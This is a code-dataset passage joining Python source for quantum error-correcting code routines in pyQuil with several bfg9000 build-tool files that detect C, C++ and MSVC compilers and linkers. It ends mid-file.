# [[ I1 0 0 | 0 0 0 ],
# [ 0 0 0 | 0 I2 E ],
# [ 0 ET I3 | 0 0 0 ]]
for i in range(r_1, r_1 + r_2):
for j in range(r_1 + r_2, n):
if self.parity_check_c2[i - r_1, j] == 1:
prog += gates.CNOT(qubits[j], qubits[i])
# Step 3: Copy X's from I1 to A1 and A2. This has the side effect of constructing D.
# Post-state:
#
# [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | D I2 E ],
# [ 0 ET I3 | 0 0 0 ]]
for i in range(r_1):
for j in range(r_1, n):
if self.parity_check_c1[i, j] == 1:
prog += gates.CNOT(qubits[i], qubits[j])
return prog
def encode_zero(self, prog: Program, block: CodeBlock, ancilla: CodeBlock, scratch: MemoryChunk):
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
flag = scratch[0]
outcome = scratch[1]
scratch = scratch[2:]
# To do a somewhat fault tolerant preparation, we will do a noisy preparation of the target
# block, then perform a Steane error correction using a noisy ancilla. Instead of actually
# doing an error correction though, we will just do error detection and repeat until no
# errors are detected. If no errors are detected, then either both the block and ancilla
# were clean or they both has the exact same errors, which is unlikely. This idea comes from
# section 4.6 of "An Introduction to Quantum Error Correction and Fault-Tolerant Quantum
# Computation" by <NAME>.
loop_prog = Program()
loop_prog += gates.MOVE(flag, 0)
block.reset(loop_prog)
loop_prog += self.noisy_encode_zero(block.qubits)
self._error_detect_x(loop_prog, block, ancilla, outcome, scratch, include_operators=True)
loop_prog += gates.IOR(flag, outcome)
self._error_detect_z(loop_prog, block, ancilla, outcome, scratch, include_operators=False)
loop_prog += gates.IOR(flag, outcome)
prog += gates.MOVE(flag, 1)
prog.while_do(flag, loop_prog)
def encode_plus(self, prog: Program, block: CodeBlock, ancilla: CodeBlock, scratch: MemoryChunk):
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
flag = scratch[0]
outcome = scratch[1]
scratch = scratch[2:]
# See encode_zero for more thorough comments.
loop_prog = Program()
loop_prog += gates.MOVE(flag, 0)
block.reset(loop_prog)
loop_prog += self.noisy_encode_plus(block.qubits)
self._error_detect_x(loop_prog, block, ancilla, outcome, scratch, include_operators=False)
loop_prog += gates.IOR(flag, outcome)
self._error_detect_z(loop_prog, block, ancilla, outcome, scratch, include_operators=True)
loop_prog += gates.IOR(flag, outcome)
prog += gates.MOVE(flag, 1)
prog.while_do(flag, loop_prog)
def apply_gate(self, prog: Program, gate_name: str, *blocks: CodeBlock):
pauli_prog = self._apply_pauli(gate_name, *blocks)
if pauli_prog is not None:
prog += pauli_prog
return
transversal_prog = self._apply_transversal(gate_name, *blocks)
if transversal_prog is not None:
prog += transversal_prog
return
universal_prog = self._apply_universal(gate_name, *blocks)
if universal_prog is not None:
prog += universal_prog
return
raise UnsupportedGateError("logical gate {} not implemented".format(gate_name))
def _apply_pauli(self, gate_name: str, *blocks: CodeBlock) -> Program:
if gate_name == 'I':
return Program()
operators = None
if gate_name == 'X':
operators = self.x_operators()
if gate_name == 'Y':
operators = self.y_operators()
if gate_name == 'Z':
operators = self.z_operators()
if operators is None:
return None
assert len(blocks) == 1
block = blocks[0]
# Only one logical qubit per code block.
pauli_term = operators[0]
assert pauli_term.coefficient == 1
return Program(gates.QUANTUM_GATES[pauli](block.qubits[q]) for q, pauli in pauli_term)
def _apply_transversal(self, gate_name: str, *blocks: CodeBlock) -> Program:
"""
Attempt to construct a program implementing the given gate transversally. If that cannot be
done with this type of code, then return None.
"""
if not self.is_transversal(gate_name):
return None
qubits = (block.qubits for block in blocks)
if gate_name == 'I':
return apply_transversally(gates.I, *qubits)
if gate_name == 'CNOT':
return apply_transversally(gates.CNOT, *qubits)
if gate_name == 'H':
return apply_transversally(gates.H, *qubits)
if gate_name == 'CZ':
return apply_transversally(gates.CZ, *qubits)
if gate_name == 'S':
return apply_transversally(
lambda qubit: [gates.Z(qubit), gates.S(qubit)], *qubits
)
raise NotImplementedError("transversal {} not implemented".format(gate_name))
def _apply_universal(self, gate_name, *blocks: List[QubitPlaceholder]) -> Program:
return None
def error_correct(self, prog: Program, data: CodeBlock,
ancilla_1: CodeBlock, ancilla_2: CodeBlock, scratch: MemoryChunk):
"""
Extend a Quil program to perform error correction.
"""
if data.n != self.n:
raise ValueError("data code word is of incorrect size")
if ancilla_1.n != self.n:
raise ValueError("ancilla_1 code word is of incorrect size")
if ancilla_2.n != self.n:
raise ValueError("ancilla_2 code word is of incorrect size")
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
# Split up the scratch buffer.
mem = scratch[:self.n]
correct_scratch = scratch[self.n:]
# See section 4.4 of "An Introduction to Quantum Error Correction and Fault-Tolerant Quantum
# Computation" by <NAME> for correction circuit.
# Propagate X errors from data block to ancilla block, then measure in the Z basis.
self.encode_plus(prog, ancilla_1, ancilla_2, scratch)
prog += apply_transversally(gates.CNOT, data.qubits, ancilla_1.qubits)
prog += (gates.MEASURE(ancilla_1.qubits[i], mem[i]) for i in range(self.n))
quil_classical_correct(prog, mem, data.x_errors, correct_scratch,
self.parity_check_c2, self._c2_syndromes)
# Propagate Z errors from data block to ancilla block, then measure in the X basis.
self.encode_zero(prog, ancilla_1, ancilla_2, scratch)
prog += apply_transversally(gates.CNOT, ancilla_1.qubits, data.qubits)
prog += apply_transversally(gates.H, ancilla_1.qubits)
prog += (gates.MEASURE(ancilla_1.qubits[i], mem[i]) for i in range(self.n))
quil_classical_correct(prog, mem, data.z_errors, correct_scratch,
self.parity_check_c1, self._c1_syndromes)
def _error_detect_x(self, prog: Program, data: CodeBlock, ancilla: CodeBlock,
outcome: MemoryReference, scratch: MemoryChunk, include_operators: bool):
"""
Extend a Quil program to perform detection of X errors on a data block. This this uses noisy
preparation of the ancilla for measurement, meaning the procedure is not totally reliable.
"""
if len(scratch) < (self.n + self.r_2 + 2):
raise ValueError("scratch buffer is too small")
# Split up the scratch buffer.
mem = scratch[:self.n]
scratch = scratch[self.n:]
# Prepare a noisy ancilla. If measuring Z operators as well, prepare in Z eigenstate,
# otherwise prepare in X eigenstate.
ancilla.reset(prog)
if include_operators:
prog += self.noisy_encode_zero(ancilla.qubits)
else:
prog += self.noisy_encode_plus(ancilla.qubits)
# Propagate X errors from data block to ancilla block, then measure in the Z basis.
prog += apply_transversally(gates.CNOT, data.qubits, ancilla.qubits)
prog += (gates.MEASURE(ancilla.qubits[i], mem[i]) for i in range(self.n))
# Perform classical error detection with parity check matrix and maybe Z operators.
check_matrix = self.parity_check_c2
if include_operators:
check_matrix = np.concatenate([check_matrix, self.z_operator_matrix()], axis=0)
quil_classical_detect(prog, mem, data.x_errors, outcome, scratch, check_matrix)
def _error_detect_z(self, prog: Program, data: CodeBlock, ancilla: CodeBlock,
outcome: MemoryReference, scratch: MemoryChunk, include_operators: bool):
"""
Extend a Quil program to perform detection of Z errors on a data block. This this uses noisy
preparation of the ancilla for measurement, meaning the procedure is not totally reliable.
"""
if len(scratch) < (self.n + self.r_1 + 2):
raise ValueError("scratch buffer is too small")
# Split up the scratch buffer.
mem = scratch[:self.n]
scratch = scratch[self.n:]
# Prepare a noisy ancilla. If measuring X operators as well, prepare in X eigenstate,
# otherwise prepare in Z eigenstate.
ancilla.reset(prog)
if include_operators:
prog += self.noisy_encode_plus(ancilla.qubits)
else:
prog += self.noisy_encode_zero(ancilla.qubits)
# Propagate Z errors from data block to ancilla block, then measure in the X basis.
prog += apply_transversally(gates.CNOT, ancilla.qubits, data.qubits)
prog += apply_transversally(gates.H, ancilla.qubits)
prog += (gates.MEASURE(ancilla.qubits[i], mem[i]) for i in range(self.n))
# Perform classical error detection with parity check matrix and maybe X operators.
check_matrix = self.parity_check_c1
if include_operators:
check_matrix = np.concatenate([check_matrix, self.x_operator_matrix()], axis=0)
quil_classical_detect(prog, mem, data.z_errors, outcome, scratch, check_matrix)
@property
def error_correct_scratch_size(self) -> int:
"""
Returns the minimum size of the scratch buffer required by error_correct.
"""
return self.encode_scratch_size
def measure(self, prog: Program, data: CodeBlock, index: int, outcome: MemoryReference,
ancilla_1: CodeBlock, ancilla_2: CodeBlock,
scratch: MemoryChunk, scratch_int: MemoryChunk):
"""
Extend a Quil program to measure the logical qubit in the Z basis. Ancilla must be in a
logical |0> state.
Index is the index of the logical qubit within the code block. Currently must be 0.
This measurement is made fault tolerant by repeating a noisy measurement 2t + 1 times and
returning a majority vote.
This yields control after each fault tolerant operation so that a round of error correction
may be performed globally if required.
"""
if index != 0:
raise ValueError("only one logical qubit per code block")
if data.n != self.n:
raise ValueError("data code word is of incorrect size")
if ancilla_1.n != self.n:
raise ValueError("ancilla_1 code word is of incorrect size")
if ancilla_2.n != self.n:
raise ValueError("ancilla_2 code word is of incorrect size")
if len(scratch) < self.measure_scratch_size:
raise ValueError("scratch buffer is too small")
if len(scratch_int) < 1:
raise ValueError("scratch_int buffer is too small")
trials = 2 * self.t + 1
# Split up the scratch buffer.
noisy_outcomes = scratch[:trials]
noisy_scratch = scratch[trials:]
for i in range(trials):
self.noisy_measure(prog, data, index, noisy_outcomes[i], ancilla_1, ancilla_2,
noisy_scratch)
yield
outcome_bit = noisy_scratch[0]
quil_classical.majority_vote(prog, noisy_outcomes, outcome_bit, scratch_int)
# Because of the stupid thing where the QVM relies on MEASURE to initialize classical
# registers, do a superfluous measure here of the already trashed ancilla.
prog += gates.MEASURE(ancilla_1.qubits[0], outcome)
# In case outcome is not a bit reference, do a CONVERT instead of a MOVE.
prog += gates.MOVE(outcome, outcome_bit)
@property
def measure_scratch_size(self) -> int:
return self.encode_scratch_size + 2 * self.t + 1
@property
def encode_scratch_size(self) -> int:
return 2 * self.n - max(self.r_1, self.r_2) + 4
def noisy_measure(self, prog: Program, data: CodeBlock, index: int, outcome: MemoryReference,
ancilla_1: CodeBlock, ancilla_2: CodeBlock, scratch: MemoryChunk):
"""
Extend a Quil program to measure the logical qubit in the Z basis. Ancilla must be in a
logical |0> state.
Index is the index of the logical qubit within the code block. Currently must be 0.
This measurement is not fault tolerant and may fail if any single operation fails.
"""
n, r_2 = self.n, self.r_2
if index != 0:
raise ValueError("only one logical qubit per code block")
if data.n != n:
raise ValueError("data code word is of incorrect size")
if ancilla_1.n != n:
raise ValueError("ancilla_1 code word is of incorrect size")
if ancilla_2.n != n:
raise ValueError("ancilla_2 code word is of incorrect size")
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
# Reset the ancilla to |0>.
self.encode_zero(prog, ancilla_1, ancilla_2, scratch)
# Split up the scratch buffer.
mem = scratch[:n]
scratch = scratch[n:(n + r_2 + 2)]
# Propagate each Z in the operator from data block to ancilla block for each, then measure
# in the Z basis.
#
# This implements the technique from section 3 of
# "Efficient fault-tolerant quantum computing" by <NAME>.
prog += apply_transversally(gates.CNOT, data.qubits, ancilla_1.qubits)
prog += (gates.MEASURE(ancilla_1.qubits[i], mem[i]) for i in range(self.n))
# Opportunistically correct any X errors.
quil_classical_correct(prog, mem, data.x_errors, scratch,
self.parity_check_c2, self._c2_syndromes)
# Finally, compute the measurement outcome.
z_operator = self.z_operator_matrix()[index:(index + 1), :]
outcome_chunk = MemoryChunk(
MemoryReference(outcome.name), outcome.offset, outcome.offset + 1
)
quil_classical.matmul(prog, z_operator, mem, outcome_chunk, scratch)
def quil_classical_correct(prog: Program, codeword: MemoryChunk, errors: MemoryChunk,
scratch: MemoryChunk, parity_check, syndromes):
"""
Extend a Quil program with instructions to correct a noisy classical codeword. Given a noisy
codeword and a vector of known existing errors, this attempts to identify the valid codeword
it decodes to. If such a correction is possible, this program updates the error vector with the
additional corrections required. If no such correction is possible because the number of errors
exceeds the unique decoding threshold, the errors vector is left unchanged.
"""
m, n = parity_check.shape
if len(codeword) != n:
raise ValueError("codeword is of incorrect size")
if len(errors) != n:
raise ValueError("errors is of incorrect size")
if len(scratch) < m + 2:
raise ValueError("scratch buffer is too small")
# Add in existing known errors to the noisy codeword.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Compute the syndrome by multiplying by the parity check matrix.
syndrome = scratch[2:m+2]
quil_classical.matmul(prog, parity_check, codeword, syndrome, scratch[:2])
# Revert codeword back to the state without error corrections.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Find the matching syndrome in the syndrome table and apply the correction.
for match_syndrome_key, correction in syndromes.items():
match_syndrome = bin_matrix.int_to_vec(match_syndrome_key, m)
matches = scratch[1:2]
quil_classical.string_match(prog, syndrome, match_syndrome, matches, scratch[:1])
quil_classical.conditional_xor(prog, errors, correction, matches, scratch[:1])
# Now correct codeword with updated corrections.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
def quil_classical_detect(prog: Program, codeword: MemoryChunk, errors: MemoryChunk,
outcome: MemoryReference, scratch: MemoryChunk, parity_check):
"""
Extend a Quil program with instructions to detect errors in a noisy classical codeword. Sets the
outcome bit if any errors are detected and unsets it otherwise.
"""
m, n = parity_check.shape
if len(codeword) != n:
raise ValueError("codeword is of incorrect size")
if len(errors) != n:
raise ValueError("errors is of incorrect size")
if len(scratch) < m + 2:
raise ValueError("scratch buffer is too small")
# Add in existing known errors to the noisy codeword.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Compute the syndrome by multiplying by the parity check matrix.
syndrome = scratch[2:m+2]
quil_classical.matmul(prog, parity_check, codeword, syndrome, scratch[:2])
# Revert codeword back to the state without error corrections.
prog += (gates.XOR(codeword[i], errors[i]) for i in range(n))
# Set outcome only if syndrome is non-zero.
prog += gates.MOVE(outcome, 0)
prog += (gates.IOR(outcome, syndrome[i]) for i in range(m))
def syndrome_table(parity_check):
"""
Given a parity check matrix of a binary linear code, determine the unique decoding threshold t
and return it along with a lookup table of syndromes to error terms of weight at most t. This
lookup table can be used to decode noisy codewords.
"""
_, n = parity_check.shape
table = {}
for w in range(n + 1):
# t_table is a table of syndromes produced by weight-t errors.
t_table = {}
for e in bin_matrix.weight_w_vectors(n, w):
syndrome = np.mod(np.matmul(parity_check, e), 2)
syndrome_int = bin_matrix.vec_to_int(syndrome)
if syndrome_int in table or syndrome_int in t_table:
return w - 1, table
t_table[syndrome_int] = e
# Merge t_table into table
table = {**table, **t_table}
return n, table
def transform_stabilisers(mat, prog):
_, n = mat.shape
for inst in prog.instructions:
if not isinstance(inst, Gate):
raise ValueError("program must only contain gates")
if any(not isinstance(qubit, Qubit) for qubit in inst.qubits):
raise ValueError("gate cannot have placeholders")
qubits = [qubit.index for qubit in inst.qubits]
if any(qubit >= n for qubit in qubits):
raise ValueError("qubit index must be within [0, n)")
if inst.name == 'H':
conjugate_h_with_check_mat(mat, *qubits)
elif inst.name == 'CNOT':
conjugate_cnot_with_check_mat(mat, *qubits)
else:
raise ValueError("cannot conjugate gate {}".format(inst.name))
def conjugate_h_with_check_mat(mat, qubit):
k, cols = mat.shape
n = cols // 2
q = qubit
for i in range(k):
if mat[i, q] == 1 and mat[i, n + q] == 1:
raise NotImplementedError("only handles CSS codes")
else:
# H switches X and Z paulis
mat[i, q], mat[i, n + q] = mat[i, n + q], mat[i, q]
def conjugate_cnot_with_check_mat(mat, control, target):
k, cols = mat.shape
n = cols // 2
c, t = control, target
for i in range(k):
# CNOT propagates X paulis from control to target
if mat[i, c] == 1:
mat[i, t] = (mat[i, t] + 1) % 2
# CNOT propagates Z paulis from target to control
if mat[i, n + t] == 1:
mat[i, n + c] = (mat[i, n + c] + 1) % 2
def swap_columns(mat, indices):
i, j = indices
mat[:,i], mat[:,j] = np.array(mat[:,j]), np.array(mat[:,i])
def pauli_term_for_row(x_check, z_check) -> PauliTerm:
"""
Determine the Pauli operator from a row in the check matrix.
See Nielsen & Chuang 10.5.1 for details.
"""
n = x_check.size
if not x_check.shape == (n,):
raise ValueError("x_check has the wrong dimensions")
if not z_check.shape == (n,):
raise ValueError("z_check has the wrong dimensions")
result = ID()
for i in range(n):
if x_check[i] and z_check[i]:
result *= sY(i)
elif x_check[i]:
result *= sX(i)
elif z_check[i]:
result *= sZ(i)
return result
def normalize_parity_check(h, offset):
r, n = h.shape
if n < offset + r:
raise ValueError("not enough columns")
qubit_swaps = []
for i in range(r):
# Find a row after the first i-1 with a 1 in the i'th column past the offset.
row = next((j for j in range(i, r) if h[j, i + offset] % 2 == 1), None)
if row is not None:
# Ensure row j has a 1 in the i'th column.
if h[i, i + offset] % 2 == 0:
h[i, :] += h[row, :]
else:
# If no remaining rows have 1 in the i'th column path the offset, then swap qubits.
col = next((j for j in range(i + offset, n) if h[i, j] % 2 == 1), None)
if col is None:
raise InvalidCodeError("rows are not independent")
qubit_swaps.append((i + offset, col))
swap_columns(h, qubit_swaps[-1])
# Ensure all other rows have a 0 in the i'th column.
for j in range(r):
if i != j and h[j, i + offset] % 2 == 1:
h[j, :] += h[i, :]
return np.mod(h, 2), qubit_swaps
def codes_equal(parity_check_1, parity_check_2) -> bool:
if parity_check_1.shape != parity_check_2.shape:
return False
return np.array_equal(
bin_matrix.reduced_row_echelon_form(parity_check_1),
bin_matrix.reduced_row_echelon_form(parity_check_2)
)
def is_doubly_even(mat):
"""
Returns whether even row in the parity check matrix of a binary code is a multiple of 4.
"""
return not np.any(np.mod(np.sum(mat, axis=1), 4))
def apply_transversally(gate, *blocks) -> Program:
return Program(gate(*qubits) for qubits in zip(*blocks))
``` |
{
"source": "jimporter/bfg9000",
"score": 2
} |
#### File: tools/cc/__init__.py
```python
import os
import re
from itertools import chain
from .. import mopack, pkg_config
from ... import log, shell
from .compiler import CcCompiler, CcPchCompiler
from .linker import CcExecutableLinker, CcSharedLibraryLinker
from .rc import CcRcBuilder # noqa: F401
from ..ar import ArLinker
from ..common import Builder, check_which
from ..ld import LdLinker
from ...exceptions import PackageResolutionError
from ...iterutils import uniques
from ...languages import known_formats
from ...packages import PackageKind
from ...path import exists
from ...platforms import parse_triplet
from ...versioning import detect_version
class CcBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
brand, version, target_flags = self._parse_brand(env, command,
version_output)
super().__init__(langinfo.name, brand, version)
self.object_format = env.target_platform.object_format
name = langinfo.var('compiler').lower()
ldinfo = known_formats['native']['dynamic']
arinfo = known_formats['native']['static']
# Try to infer the appropriate -fuse-ld option from the LD environment
# variable.
link_command = command[:]
ld_command = env.getvar(ldinfo.var('linker'))
if ld_command:
tail = os.path.splitext(ld_command)[1][1:]
if tail in ['bfd', 'gold']:
log.info('setting `-fuse-ld={}` for `{}`'
.format(tail, shell.join(command)))
link_command.append('-fuse-ld={}'.format(tail))
cflags_name = langinfo.var('flags').lower()
cflags = (target_flags +
shell.split(env.getvar('CPPFLAGS', '')) +
shell.split(env.getvar(langinfo.var('flags'), '')))
ldflags_name = ldinfo.var('flags').lower()
ldflags = (target_flags +
shell.split(env.getvar(ldinfo.var('flags'), '')))
ldlibs_name = ldinfo.var('libs').lower()
ldlibs = shell.split(env.getvar(ldinfo.var('libs'), ''))
ar_name = arinfo.var('linker').lower()
ar_which = check_which(env.getvar(arinfo.var('linker'), 'ar'),
env.variables, kind='static linker')
arflags_name = arinfo.var('flags').lower()
arflags = shell.split(env.getvar(arinfo.var('flags'), 'cr'))
# macOS's ld doesn't support --version, but we can still try it out and
# grab the command line.
ld_command = None
try:
stdout, stderr = env.execute(
command + ldflags + ['-v', '-Wl,--version'],
stdout=shell.Mode.pipe, stderr=shell.Mode.pipe,
returncode='any'
)
for line in stderr.split('\n'):
if '--version' in line:
ld_command = shell.split(line)[0:1]
if os.path.basename(ld_command[0]) != 'collect2':
break
except (OSError, shell.CalledProcessError):
pass
compile_kwargs = {'command': (name, command, found),
'flags': (cflags_name, cflags)}
self.compiler = CcCompiler(self, env, **compile_kwargs)
try:
self.pch_compiler = CcPchCompiler(self, env, **compile_kwargs)
except ValueError:
self.pch_compiler = None
link_kwargs = {'command': (name, link_command, found),
'flags': (ldflags_name, ldflags),
'libs': (ldlibs_name, ldlibs)}
self._linkers = {
'executable': CcExecutableLinker(self, env, **link_kwargs),
'shared_library': CcSharedLibraryLinker(self, env, **link_kwargs),
'static_library': ArLinker(
self, env, command=(ar_name,) + ar_which,
flags=(arflags_name, arflags)
),
}
if ld_command:
self._linkers['raw'] = LdLinker(self, env, ld_command, stdout)
self.packages = CcPackageResolver(self, env, command, ldflags)
self.runner = None
@classmethod
def _parse_brand(cls, env, command, version_output):
target_flags = []
if 'Free Software Foundation' in version_output:
brand = 'gcc'
version = detect_version(version_output)
if env.is_cross:
triplet = parse_triplet(env.execute(
command + ['-dumpmachine'],
stdout=shell.Mode.pipe, stderr=shell.Mode.devnull
).rstrip())
target_flags = cls._gcc_arch_flags(
env.target_platform.arch, triplet.arch
)
elif 'clang' in version_output:
brand = 'clang'
version = detect_version(version_output)
if env.is_cross:
target_flags = ['-target', env.target_platform.triplet]
else:
brand = 'unknown'
version = None
return brand, version, target_flags
@staticmethod
def _gcc_arch_flags(arch, native_arch):
if arch == native_arch:
return []
elif arch == 'x86_64':
return ['-m64']
elif re.match(r'i.86$', arch):
return ['-m32'] if not re.match(r'i.86$', native_arch) else []
return []
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
@property
def flavor(self):
return 'cc'
@property
def family(self):
return 'native'
@property
def auto_link(self):
return False
@property
def can_dual_link(self):
return True
def linker(self, mode):
return self._linkers[mode]
class CcPackageResolver:
def __init__(self, builder, env, command, ldflags):
self.builder = builder
self.env = env
self.include_dirs = [i for i in uniques(chain(
self.builder.compiler.search_dirs(),
self.env.host_platform.include_dirs
)) if exists(i)]
cc_lib_dirs = self.builder.linker('executable').search_dirs()
try:
sysroot = self.builder.linker('executable').sysroot()
ld_lib_dirs = self.builder.linker('raw').search_dirs(sysroot, True)
except (KeyError, OSError, shell.CalledProcessError):
ld_lib_dirs = self.env.host_platform.lib_dirs
self.lib_dirs = [i for i in uniques(chain(
cc_lib_dirs, ld_lib_dirs, self.env.host_platform.lib_dirs
)) if exists(i)]
@property
def lang(self):
return self.builder.lang
def _lib_names(self, kind):
names = []
if kind & PackageKind.shared:
base = 'lib{}' + self.env.target_platform.shared_library_ext
if self.env.target_platform.has_import_library:
names.append(base + '.a')
else:
names.append(base)
if kind & PackageKind.static:
names.append('lib{}.a')
# XXX: Include Cygwin here too?
if self.env.target_platform.family == 'windows':
# We don't actually know what kind of library this is. It could be
# a static library or an import library (which we classify as a
# kind of shared lib).
names.append('{}.lib')
return names
# TODO: Remove headers/libs from arguments after 0.7 is released.
def resolve(self, name, submodules, version, kind, *, headers=None,
libs=None, system=True):
format = self.builder.object_format
usage = mopack.get_usage(self.env, name, submodules, self.include_dirs,
self.lib_dirs, self._lib_names(kind))
if usage.get('auto_link', False):
raise PackageResolutionError('package {!r} requires auto-link'
.format(name))
# XXX: Add headers/libs here somehow? Add them into PkgConfigPackage
# directly?
return pkg_config.resolve(
self.env, name, submodules, version, usage['pcfiles'],
format=format, kind=kind, system=system, search_path=usage['path'],
extra_options=usage.get('extra_args', []),
generated=usage.get('generated', False)
)
```
#### File: bfg9000/tools/c_family.py
```python
from collections import namedtuple
from . import builder, cc, msvc
from .. import log
from .common import choose_builder, make_command_converter_pair
from ..languages import known_formats, known_langs
_guessed_info = namedtuple('_guessed_info', ['lang', 'cmd', 'guessed_cmd'])
with known_langs.make('c') as x:
x.vars(compiler='CC', flags='CFLAGS')
x.exts(source=['.c'], header=['.h'])
with known_langs.make('c++') as x:
x.vars(compiler='CXX', flags='CXXFLAGS')
x.exts(source=['.cpp', '.cc', '.cp', '.cxx', '.CPP', '.c++', '.C'],
header=['.hpp', '.hh', '.hp', '.hxx', '.HPP', '.h++', '.H'])
x.auxexts(header=['.h'])
with known_langs.make('objc') as x:
x.vars(compiler='OBJC', flags='OBJCFLAGS')
x.exts(source=['.m'])
x.auxexts(header=['.h'])
with known_langs.make('objc++') as x:
x.vars(compiler='OBJCXX', flags='OBJCXXFLAGS')
x.exts(source=['.mm', '.M'])
x.auxexts(header=['.h'])
with known_formats.make('native', src_lang='c') as fmt:
with fmt.make('dynamic') as x:
x.vars(linker='LD', flags='LDFLAGS', libs='LDLIBS')
with fmt.make('static') as x:
x.vars(linker='AR', flags='ARFLAGS')
_c_to_cxx, _cxx_to_c = make_command_converter_pair([
# These are ordered from most- to least-specific; in particular, we want
# `clang-cl` to stay that way when converted between C and C++ contexts.
('clang-cl', 'clang-cl'),
('cc', 'c++'),
('gcc', 'g++'),
('clang', 'clang++'),
('cl', 'cl'),
])
_siblings = {
'c' : ['objc', 'c++', 'objc++'],
'c++' : ['objc++', 'c', 'objc'],
'objc' : ['c', 'objc++', 'c++'],
'objc++': ['c++', 'objc', 'c'],
}
_posix_cmds = {
'c' : ['cc'],
'c++' : ['c++'],
'objc' : ['cc'],
'objc++': ['c++'],
}
_windows_cmds = {
'c' : ['cl', 'clang-cl', 'cc', 'gcc', 'clang'],
'c++' : ['cl', 'clang-cl', 'c++', 'g++', 'clang++'],
'objc' : ['cc', 'gcc', 'clang'],
'objc++': ['c++', 'g++', 'clang++'],
}
_builders = (msvc.MsvcBuilder, cc.CcBuilder)
_fallback_posix_builder = cc.CcBuilder
_fallback_windows_builder = msvc.MsvcBuilder
def _guess_candidates(env, lang):
def is_cxx_based(lang):
return lang.endswith('c++')
candidates = []
cxx_based = is_cxx_based(lang)
for i in _siblings[lang]:
cmd = sibling_cmd = env.getvar(known_langs[i].var('compiler'))
if sibling_cmd is not None:
sibling_cxx_based = is_cxx_based(i)
if cxx_based and not sibling_cxx_based:
cmd = _c_to_cxx(cmd)
elif not cxx_based and sibling_cxx_based:
cmd = _cxx_to_c(cmd)
if cmd is not None:
candidates.append(_guessed_info(i, sibling_cmd, cmd))
return candidates
@builder('c', 'c++', 'objc', 'objc++')
def c_family_builder(env, lang):
if env.host_platform.family == 'windows':
candidates = _windows_cmds[lang]
fallback = _fallback_windows_builder
else:
candidates = _posix_cmds[lang]
fallback = _fallback_posix_builder
langinfo = known_langs[lang]
cmd = env.getvar(langinfo.var('compiler'))
if cmd:
return choose_builder(env, langinfo, _builders, candidates=cmd,
fallback_builder=fallback)
# We don't have an explicitly-set command from the environment, so try to
# guess what the right command would be.
guessed_info = _guess_candidates(env, lang)
# If the last guessed command is the same as the first default command
# candidate, remove it. This will keep us from logging a useless info
# message that we guessed the default value for the command.
if guessed_info and guessed_info[-1].guessed_cmd == candidates[0]:
del guessed_info[-1]
for sibling_lang, sibling_cmd, guessed_cmd in guessed_info:
try:
builder = choose_builder(env, langinfo, _builders,
candidates=guessed_cmd,
fallback_builder=fallback, strict=True)
log.info('guessed {} compiler {!r} from {} compiler {!r}'.format(
lang, guessed_cmd, sibling_lang, sibling_cmd
))
return builder
except IOError:
pass
# Try all the default command candidates we haven't already tried above.
guesses = [i.guessed_cmd for i in guessed_info]
untried_candidates = [i for i in candidates if i not in guesses]
return choose_builder(env, langinfo, _builders,
candidates=untried_candidates,
fallback_builder=fallback)
```
#### File: tools/msvc/__init__.py
```python
import os.path
from itertools import chain
from .. import mopack, pkg_config
from ... import shell
from .compiler import MsvcCompiler, MsvcPchCompiler
from .linker import (MsvcExecutableLinker, MsvcSharedLibraryLinker,
MsvcStaticLinker)
from .rc import MsvcRcBuilder # noqa: F401
from ..common import Builder, check_which
from ...iterutils import uniques
from ...languages import known_formats
from ...path import exists
from ...versioning import detect_version
class MsvcBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
brand, version = self._parse_brand(env, command, version_output)
super().__init__(langinfo.name, brand, version)
self.object_format = env.target_platform.object_format
name = langinfo.var('compiler').lower()
ldinfo = known_formats['native']['dynamic']
arinfo = known_formats['native']['static']
# Look for the last argument that looks like our compiler and use its
# directory as the base directory to find the linkers.
origin = ''
for i in reversed(command):
if os.path.basename(i) in ('cl', 'cl.exe'):
origin = os.path.dirname(i)
link_which = check_which(
env.getvar(ldinfo.var('linker'), os.path.join(origin, 'link')),
env.variables, kind='{} dynamic linker'.format(self.lang)
)
lib_which = check_which(
env.getvar(arinfo.var('linker'), os.path.join(origin, 'lib')),
env.variables, kind='{} static linker'.format(self.lang)
)
cflags_name = langinfo.var('flags').lower()
cflags = (
shell.split(env.getvar('CPPFLAGS', '')) +
shell.split(env.getvar(langinfo.var('flags'), ''))
)
ld_name = ldinfo.var('linker').lower()
ldflags_name = ldinfo.var('flags').lower()
ldflags = shell.split(env.getvar(ldinfo.var('flags'), ''))
ldlibs_name = ldinfo.var('libs').lower()
ldlibs = shell.split(env.getvar(ldinfo.var('libs'), ''))
ar_name = arinfo.var('linker').lower()
arflags_name = arinfo.var('flags').lower()
arflags = shell.split(env.getvar(arinfo.var('flags'), ''))
compile_kwargs = {'command': (name, command, found),
'flags': (cflags_name, cflags)}
self.compiler = MsvcCompiler(self, env, **compile_kwargs)
self.pch_compiler = MsvcPchCompiler(self, env, **compile_kwargs)
link_kwargs = {'command': (ld_name,) + link_which,
'flags': (ldflags_name, ldflags),
'libs': (ldlibs_name, ldlibs)}
self._linkers = {
'executable': MsvcExecutableLinker(self, env, name, **link_kwargs),
'shared_library': MsvcSharedLibraryLinker(self, env, name,
**link_kwargs),
'static_library': MsvcStaticLinker(
self, env, command=(ar_name,) + lib_which,
flags=(arflags_name, arflags)
),
}
self.packages = MsvcPackageResolver(self, env)
self.runner = None
@staticmethod
def _parse_brand(env, command, version_output):
if 'Microsoft (R)' in version_output:
return 'msvc', detect_version(version_output)
elif 'clang LLVM compiler' in version_output:
real_version = env.execute(
command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.stdout
)
return 'clang', detect_version(real_version)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['-?'], stdout=shell.Mode.pipe,
stderr=shell.Mode.stdout)
@property
def flavor(self):
